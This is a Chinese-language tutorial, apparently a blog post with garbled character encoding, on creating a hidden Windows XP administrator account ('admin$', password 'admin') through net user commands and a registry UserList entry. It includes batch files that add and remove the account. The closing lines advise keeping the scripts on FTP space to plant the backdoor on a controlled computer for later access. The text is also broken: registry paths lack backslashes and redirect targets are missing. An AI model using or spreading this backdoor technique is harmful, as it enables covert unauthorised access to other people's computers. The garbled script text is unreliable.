計(jì)算機(jī)中創(chuàng)建一個(gè)隱藏的賬戶可以作為遠(yuǎn)程登錄的用戶來遠(yuǎn)控計(jì)算機(jī)或者查看計(jì)算機(jī)的磁盤信息。以下是在Windows XP SP3虛擬機(jī)中演示的步驟：使用的環(huán)境- 宿主機(jī)：Windows XP SP3- 虛擬

計(jì)算機(jī)中創(chuàng)建一個(gè)隱藏的賬戶可以作為遠(yuǎn)程登錄的用戶來遠(yuǎn)控計(jì)算機(jī)或者查看計(jì)算機(jī)的磁盤信息。以下是在Windows XP SP3虛擬機(jī)中演示的步驟：

使用的環(huán)境

- 宿主機(jī)：Windows XP SP3

- 虛擬機(jī)：Vmware Workstation下的Windows XP SP3

使用的工具

A. 系統(tǒng)工具：

- Regedit.exe

- Cmd.exe

B. 自建的批處理和注冊(cè)表：

- 開啟賬戶及添加隱藏注冊(cè)表.bat

- 關(guān)閉賬戶及刪除隱藏注冊(cè)表.bat

步驟

1. 本地創(chuàng)建隱藏賬戶和建立隱藏"登錄時(shí)賬戶顯示"的注冊(cè)表文件。

打開命令提示符（Cmd.exe）并輸入以下命令：

```

net user admin$ admin /add

```

這會(huì)在計(jì)算機(jī)中創(chuàng)建一個(gè)用戶名為admin$、密碼為admin的賬戶。此時(shí)創(chuàng)建的這個(gè)帶$符號(hào)的賬戶是隱藏的。通過運(yùn)行`net user`命令，我們無法找到這個(gè)用戶。然而，在"計(jì)算機(jī)管理"的"本地用戶和組"->"用戶"中，我們可以看到存在admin$的賬戶。

接下來，將admin賬戶添加到管理員組中，以便以后對(duì)計(jì)算機(jī)進(jìn)行控制。在命令提示符中輸入以下命令：

```

net localgroup administrators admin$ /add

```

至此，本地計(jì)算機(jī)的隱藏賬戶已創(chuàng)建完成。注銷計(jì)算機(jī)后，在登錄界面仍然可以看到admin$的賬戶。那么，如何將登錄界面上的admin$賬戶也隱藏掉呢？我們可以進(jìn)入注冊(cè)表中新建一個(gè)鍵來實(shí)現(xiàn)。

在注冊(cè)表編輯器（Regedit.exe）的菜單欄中選擇"編輯"->"查找"，并搜索"userlist"，找到[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList]這個(gè)鍵值。在該鍵下新建一個(gè)名為admin$的DWORD類型鍵，其值為"admin$"dword:00000000。

快速打開方法是在注冊(cè)表編輯器（Regedit.exe）的菜單欄中選擇"編輯"->"查找"，并連續(xù)點(diǎn)擊兩次"下一個(gè)"按鈕即可定位到userlist這個(gè)鍵值。

保存userlist下的鍵值為""，方便之后的批處理使用。注銷計(jì)算機(jī)后，你會(huì)發(fā)現(xiàn)此時(shí)admin$賬戶已不見了。

通過以上步驟，在命令提示符下的"net user"命令和系統(tǒng)登錄界面中都無法看到admin$的影子。唯一可以看到的是"計(jì)算機(jī)管理"中的用戶列表。一般用戶通常不會(huì)去查看最后一個(gè)地方，因此我們成功地創(chuàng)建了一個(gè)相對(duì)隱藏較深的計(jì)算機(jī)賬戶。

現(xiàn)在，我們可以刪除以上設(shè)置。

批處理編寫

以下是用于創(chuàng)建隱藏賬戶和添加注冊(cè)表的批處理文件內(nèi)容（"開啟賬戶及添加隱藏注冊(cè)表.bat"）：

```

@echo off

net user admin$ admin /add >nul

net localgroup administrators admin$ /add >nul

echo Windows Registry Editor Version 5.00 >

echo. >>

echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList] >>

echo "admin$"dword:00000000 >>

echo. >>

regedit /s >nul

del >nul

```

以下是用于刪除隱藏賬戶和相關(guān)注冊(cè)表信息的批處理文件內(nèi)容（"關(guān)閉賬戶及刪除隱藏注冊(cè)表.bat"）：

```

@echo off

net user admin$ /del >nul

reg delete "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "admin$" /f >nul

```

一旦有了以上兩個(gè)批處理文件，我們可以將它們放在自己的網(wǎng)絡(luò)空間或FTP空間中，隨時(shí)備用。適當(dāng)?shù)臅r(shí)候，在受控的計(jì)算機(jī)中創(chuàng)建一個(gè)隱藏的賬戶，以便下次使用該計(jì)算機(jī)的資源。